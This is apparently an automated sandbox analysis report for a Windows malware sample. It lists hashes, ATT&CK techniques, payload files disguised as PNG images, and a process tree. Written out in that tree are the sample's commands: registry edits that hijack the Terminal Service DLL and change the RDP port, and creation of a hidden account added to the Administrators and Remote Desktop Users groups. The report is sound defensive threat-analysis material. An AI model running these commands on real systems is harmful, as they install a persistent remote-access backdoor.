d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45

General

Target

d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe
Size

3.1MB
MD5

c9cc3da6e84aedbd74218e5edea5d039
SHA1

f7b3f452245571dfe0906f417cf1cf1097d5cc44
SHA256

d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45
SHA512

fb33da351c2f8e68dfcf32f373f2894ef1fd7ad523aa85426231eaf5412d63a47a12ef078f3e56e124676d787f6d71139cec377fa60c7ba7ce255f5d4b18f7fe

Score

9^/10

persistence upx

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

3796
3796

pid	process
3796
3796

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2176 reg.exe
Runs net.exe

pid	process
2176	reg.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
572	powershell.exe
572	powershell.exe
572	powershell.exe
2144	powershell.exe
2144	powershell.exe
2144	powershell.exe
3920	powershell.exe
3920	powershell.exe
3920	powershell.exe
2840	powershell.exe
2840	powershell.exe
2840	powershell.exe
572	powershell.exe
572	powershell.exe
572	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

636
636

pid	process
636
636

Suspicious use of AdjustPrivilegeToken 67 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	572	powershell.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	3920	powershell.exe
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeIncreaseQuotaPrivilege	2144	powershell.exe
Token: SeSecurityPrivilege	2144	powershell.exe
Token: SeTakeOwnershipPrivilege	2144	powershell.exe
Token: SeLoadDriverPrivilege	2144	powershell.exe
Token: SeSystemProfilePrivilege	2144	powershell.exe
Token: SeSystemtimePrivilege	2144	powershell.exe
Token: SeProfSingleProcessPrivilege	2144	powershell.exe
Token: SeIncBasePriorityPrivilege	2144	powershell.exe
Token: SeCreatePagefilePrivilege	2144	powershell.exe
Token: SeBackupPrivilege	2144	powershell.exe
Token: SeRestorePrivilege	2144	powershell.exe
Token: SeShutdownPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeSystemEnvironmentPrivilege	2144	powershell.exe
Token: SeRemoteShutdownPrivilege	2144	powershell.exe
Token: SeUndockPrivilege	2144	powershell.exe
Token: SeManageVolumePrivilege	2144	powershell.exe
Token: 33	2144	powershell.exe
Token: 34	2144	powershell.exe
Token: 35	2144	powershell.exe
Token: 36	2144	powershell.exe
Token: SeIncreaseQuotaPrivilege	2840	powershell.exe
Token: SeSecurityPrivilege	2840	powershell.exe
Token: SeTakeOwnershipPrivilege	2840	powershell.exe
Token: SeLoadDriverPrivilege	2840	powershell.exe
Token: SeSystemProfilePrivilege	2840	powershell.exe
Token: SeSystemtimePrivilege	2840	powershell.exe
Token: SeProfSingleProcessPrivilege	2840	powershell.exe
Token: SeIncBasePriorityPrivilege	2840	powershell.exe
Token: SeCreatePagefilePrivilege	2840	powershell.exe
Token: SeBackupPrivilege	2840	powershell.exe
Token: SeRestorePrivilege	2840	powershell.exe
Token: SeShutdownPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeSystemEnvironmentPrivilege	2840	powershell.exe
Token: SeRemoteShutdownPrivilege	2840	powershell.exe
Token: SeUndockPrivilege	2840	powershell.exe
Token: SeManageVolumePrivilege	2840	powershell.exe
Token: 33	2840	powershell.exe
Token: 34	2840	powershell.exe
Token: 35	2840	powershell.exe
Token: 36	2840	powershell.exe
Token: SeIncreaseQuotaPrivilege	3920	powershell.exe
Token: SeSecurityPrivilege	3920	powershell.exe
Token: SeTakeOwnershipPrivilege	3920	powershell.exe
Token: SeLoadDriverPrivilege	3920	powershell.exe
Token: SeSystemProfilePrivilege	3920	powershell.exe
Token: SeSystemtimePrivilege	3920	powershell.exe
Token: SeProfSingleProcessPrivilege	3920	powershell.exe
Token: SeIncBasePriorityPrivilege	3920	powershell.exe
Token: SeCreatePagefilePrivilege	3920	powershell.exe
Token: SeBackupPrivilege	3920	powershell.exe
Token: SeRestorePrivilege	3920	powershell.exe
Token: SeShutdownPrivilege	3920	powershell.exe
Token: SeDebugPrivilege	3920	powershell.exe
Token: SeSystemEnvironmentPrivilege	3920	powershell.exe
Token: SeRemoteShutdownPrivilege	3920	powershell.exe
Token: SeUndockPrivilege	3920	powershell.exe
Token: SeManageVolumePrivilege	3920	powershell.exe
Token: 33	3920	powershell.exe

Suspicious use of WriteProcessMemory 70 IoCs

Processes:

d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 912 wrote to memory of 572	912	d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe	powershell.exe
PID 912 wrote to memory of 572	912	d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe	powershell.exe
PID 572 wrote to memory of 1348	572	powershell.exe	csc.exe
PID 572 wrote to memory of 1348	572	powershell.exe	csc.exe
PID 1348 wrote to memory of 2688	1348	csc.exe	cvtres.exe
PID 1348 wrote to memory of 2688	1348	csc.exe	cvtres.exe
PID 572 wrote to memory of 2144	572	powershell.exe	powershell.exe
PID 572 wrote to memory of 2144	572	powershell.exe	powershell.exe
PID 572 wrote to memory of 3920	572	powershell.exe	powershell.exe
PID 572 wrote to memory of 3920	572	powershell.exe	powershell.exe
PID 572 wrote to memory of 2840	572	powershell.exe	powershell.exe
PID 572 wrote to memory of 2840	572	powershell.exe	powershell.exe
PID 572 wrote to memory of 2264	572	powershell.exe	reg.exe
PID 572 wrote to memory of 2264	572	powershell.exe	reg.exe
PID 572 wrote to memory of 2176	572	powershell.exe	reg.exe
PID 572 wrote to memory of 2176	572	powershell.exe	reg.exe
PID 572 wrote to memory of 3092	572	powershell.exe	reg.exe
PID 572 wrote to memory of 3092	572	powershell.exe	reg.exe
PID 572 wrote to memory of 3644	572	powershell.exe	net.exe
PID 572 wrote to memory of 3644	572	powershell.exe	net.exe
PID 3644 wrote to memory of 3912	3644	net.exe	net1.exe
PID 3644 wrote to memory of 3912	3644	net.exe	net1.exe
PID 572 wrote to memory of 760	572	powershell.exe	cmd.exe
PID 572 wrote to memory of 760	572	powershell.exe	cmd.exe
PID 760 wrote to memory of 2740	760	cmd.exe	cmd.exe
PID 760 wrote to memory of 2740	760	cmd.exe	cmd.exe
PID 2740 wrote to memory of 3840	2740	cmd.exe	net.exe
PID 2740 wrote to memory of 3840	2740	cmd.exe	net.exe
PID 3840 wrote to memory of 2844	3840	net.exe	net1.exe
PID 3840 wrote to memory of 2844	3840	net.exe	net1.exe
PID 572 wrote to memory of 1060	572	powershell.exe	cmd.exe
PID 572 wrote to memory of 1060	572	powershell.exe	cmd.exe
PID 1060 wrote to memory of 800	1060	cmd.exe	cmd.exe
PID 1060 wrote to memory of 800	1060	cmd.exe	cmd.exe
PID 800 wrote to memory of 4036	800	cmd.exe	net.exe
PID 800 wrote to memory of 4036	800	cmd.exe	net.exe
PID 4036 wrote to memory of 516	4036	net.exe	net1.exe
PID 4036 wrote to memory of 516	4036	net.exe	net1.exe
PID 2776 wrote to memory of 2840	2776	cmd.exe	net.exe
PID 2776 wrote to memory of 2840	2776	cmd.exe	net.exe
PID 2840 wrote to memory of 1352	2840	net.exe	net1.exe
PID 2840 wrote to memory of 1352	2840	net.exe	net1.exe
PID 1772 wrote to memory of 2208	1772	cmd.exe	net.exe
PID 1772 wrote to memory of 2208	1772	cmd.exe	net.exe
PID 2208 wrote to memory of 228	2208	net.exe	net1.exe
PID 2208 wrote to memory of 228	2208	net.exe	net1.exe
PID 4080 wrote to memory of 3980	4080	cmd.exe	net.exe
PID 4080 wrote to memory of 3980	4080	cmd.exe	net.exe
PID 3980 wrote to memory of 2844	3980	net.exe	net1.exe
PID 3980 wrote to memory of 2844	3980	net.exe	net1.exe
PID 3952 wrote to memory of 652	3952	cmd.exe	net.exe
PID 3952 wrote to memory of 652	3952	cmd.exe	net.exe
PID 652 wrote to memory of 3788	652	net.exe	net1.exe
PID 652 wrote to memory of 3788	652	net.exe	net1.exe
PID 1604 wrote to memory of 2776	1604	cmd.exe	net.exe
PID 1604 wrote to memory of 2776	1604	cmd.exe	net.exe
PID 2776 wrote to memory of 1032	2776	net.exe	net1.exe
PID 2776 wrote to memory of 1032	2776	net.exe	net1.exe
PID 2536 wrote to memory of 2264	2536	cmd.exe	net.exe
PID 2536 wrote to memory of 2264	2536	cmd.exe	net.exe
PID 2264 wrote to memory of 1212	2264	net.exe	net1.exe
PID 2264 wrote to memory of 1212	2264	net.exe	net1.exe
PID 572 wrote to memory of 2844	572	powershell.exe	cmd.exe
PID 572 wrote to memory of 2844	572	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe
"C:\Users\Admin\AppData\Local\Temp\d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:912

\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:572

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gviksms1\gviksms1.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1348

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B81.tmp" "c:\Users\Admin\AppData\Local\Temp\gviksms1\CSC95561934605341159D384D8599A7156.TMP"
4⤵
PID:2688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:2264

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:2176

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:3092

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:3644

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:3912

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:760

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:3840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:2844

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:800

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:4036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:516

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:2844

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:2616

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2776

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:2840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
PID:1352

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc X1x9MXvy /add
1⤵
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\system32\net.exe
net.exe user wgautilacc X1x9MXvy /add
2⤵
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc X1x9MXvy /add
3⤵
PID:228

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4080

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
PID:2844

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3952

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
3⤵
PID:3788

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:2776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
PID:1032

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc X1x9MXvy
1⤵
- Suspicious use of WriteProcessMemory
PID:2536

C:\Windows\system32\net.exe
net.exe user wgautilacc X1x9MXvy
2⤵
- Suspicious use of WriteProcessMemory
PID:2264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc X1x9MXvy
3⤵
PID:1212

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:2432

C:\Windows\system32\net.exe
net user wgautilacc 1234
2⤵
PID:760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 1234
3⤵
PID:2132

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

1

T1098

Registry Run Keys / Startup Folder

1

T1060

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

1

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES6B81.tmp
MD5
09f2d573c2bfa764b4ed824e2d2a1aa3

SHA1
4427dcc41ec426a091bfa4a99fceaa51b2e1b122

SHA256
e8a62d26983e305cde547fbf03408940f563fa7b04f12f3448372e5451ff6e12

SHA512
621850beb6187b775a4a91e458f915c5db575d32ef16d1e1c56db97ccc0f2db0757e39c20b2a3b6f4529b5137bd2f5ced7db8b12c9d37bdfb3454a13b92632d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
41d1a9d1cbee90f1e5f27fdfb299f8b8

SHA1
1e9ac27006a7c364649265246fccbd719418ceab

SHA256
0f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4

SHA512
f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422

Download Submit
C:\Users\Admin\AppData\Local\Temp\gviksms1\gviksms1.dll
MD5
02596fef0c68550c59071f6b0fa276db

SHA1
1327e49fbf466212c80d1e8837752c9c44565aeb

SHA256
1b3d2c99a3236b89486659c2cfa43a2d4606a24fa881f9459ec501756823fa58

SHA512
d9f82ab026facd113cbb27e44247467e7bb98924ddc2a16e2c1e1e396323e4b0674d7a768bd5690db927d7bc4b03ce0afd6dd9a4152243acabc41302c7900776

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gviksms1\CSC95561934605341159D384D8599A7156.TMP
MD5
8ba7e1ce7b66489e234b9ff3898ce848

SHA1
fb3eab726c3c8cbbfb5c03c3a35af4f0ba6701d4

SHA256
ba23541c0f96e23ecc92a8fe0cef54837ea4ede2e2c10751afb462d05f140439

SHA512
da7ba292c6413b7dbdc7d10ad1c5ec3ab7b22d12a7e0cc2e366e5ca1450e014b35cc8bac7df857875ad3f938c8ee4154a5f673b27a65f09dea8e95a483e6c171

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gviksms1\gviksms1.0.cs
MD5
8e55cb0ca998472ab6d3e295e0c4dd50

SHA1
407d07a29b89fc3afc246c0680d5857e3f51019d

SHA256
63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

SHA512
c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gviksms1\gviksms1.cmdline
MD5
144e26476cced02b91bb5e6544a6ac72

SHA1
c03936e7b4425a50102230a9db0c33e465f0bee0

SHA256
215cc9d337f01ca6a52ab9a6d8a8715693db7fd7f72a7965a07e6c49fa6bed29

SHA512
fd5f685ffa13818d08d5601bc6bef84960a8580338a9db625723c01a61bc4ba0c2e6b5612e0a98da2e046e16c3c5cf5a422a715e171cc2c24841ebfeb9ab8217

Download Submit
\Windows\Branding\mediasrv.png
MD5
37fb7ba711ffbe9d6ebb27d54e827966

SHA1
4d4d9303e011bcb14720b24239a1aacd58122f47

SHA256
81b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5

SHA512
3f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf

Download Submit
\Windows\Branding\mediasvc.png
MD5
2f916498a393e2f0d008d33a74c062ba

SHA1
404d52d4253ef3843ae3f2c4aff050f37fcd3f08

SHA256
d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412

SHA512
d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10

Download Submit
memory/228-48-0x0000000000000000-mapping.dmp

Download
memory/516-42-0x0000000000000000-mapping.dmp

Download
memory/572-17-0x00000179A05F0000-0x00000179A05F1000-memory.dmp

Filesize
4KB

Download
memory/572-3-0x00007FF8FDFB0000-0x00007FF8FE99C000-memory.dmp

Filesize
9.9MB

Download
memory/572-5-0x00000179FEA50000-0x00000179FEA51000-memory.dmp

Filesize
4KB

Download
memory/572-6-0x00000179FEFA0000-0x00000179FEFA1000-memory.dmp

Filesize
4KB

Download
memory/572-15-0x0000017998000000-0x0000017998001000-memory.dmp

Filesize
4KB

Download
memory/572-16-0x00000179A0260000-0x00000179A0261000-memory.dmp

Filesize
4KB

Download
memory/572-2-0x0000000000000000-mapping.dmp

Download
memory/572-4-0x00000179FC3E0000-0x00000179FC3E1000-memory.dmp

Filesize
4KB

Download
memory/652-51-0x0000000000000000-mapping.dmp

Download
memory/760-35-0x0000000000000000-mapping.dmp

Download
memory/760-59-0x0000000000000000-mapping.dmp

Download
memory/800-40-0x0000000000000000-mapping.dmp

Download
memory/912-1-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

Filesize
4KB

Download
memory/1032-54-0x0000000000000000-mapping.dmp

Download
memory/1060-39-0x0000000000000000-mapping.dmp

Download
memory/1212-56-0x0000000000000000-mapping.dmp

Download
memory/1348-8-0x0000000000000000-mapping.dmp

Download
memory/1352-46-0x0000000000000000-mapping.dmp

Download
memory/2132-60-0x0000000000000000-mapping.dmp

Download
memory/2144-19-0x00007FF8FDFB0000-0x00007FF8FE99C000-memory.dmp

Filesize
9.9MB

Download
memory/2144-18-0x0000000000000000-mapping.dmp

Download
memory/2176-31-0x0000000000000000-mapping.dmp

Download
memory/2208-47-0x0000000000000000-mapping.dmp

Download
memory/2264-30-0x0000000000000000-mapping.dmp

Download
memory/2264-55-0x0000000000000000-mapping.dmp

Download
memory/2616-58-0x0000000000000000-mapping.dmp

Download
memory/2688-11-0x0000000000000000-mapping.dmp

Download
memory/2740-36-0x0000000000000000-mapping.dmp

Download
memory/2776-53-0x0000000000000000-mapping.dmp

Download
memory/2840-45-0x0000000000000000-mapping.dmp

Download
memory/2840-27-0x00007FF8FDFB0000-0x00007FF8FE99C000-memory.dmp

Filesize
9.9MB

Download
memory/2840-25-0x0000000000000000-mapping.dmp

Download
memory/2844-38-0x0000000000000000-mapping.dmp

Download
memory/2844-50-0x0000000000000000-mapping.dmp

Download
memory/2844-57-0x0000000000000000-mapping.dmp

Download
memory/3092-32-0x0000000000000000-mapping.dmp

Download
memory/3644-33-0x0000000000000000-mapping.dmp

Download
memory/3788-52-0x0000000000000000-mapping.dmp

Download
memory/3840-37-0x0000000000000000-mapping.dmp

Download
memory/3912-34-0x0000000000000000-mapping.dmp

Download
memory/3920-23-0x00007FF8FDFB0000-0x00007FF8FE99C000-memory.dmp

Filesize
9.9MB

Download
memory/3920-21-0x0000000000000000-mapping.dmp

Download
memory/3980-49-0x0000000000000000-mapping.dmp

Download
memory/4036-41-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads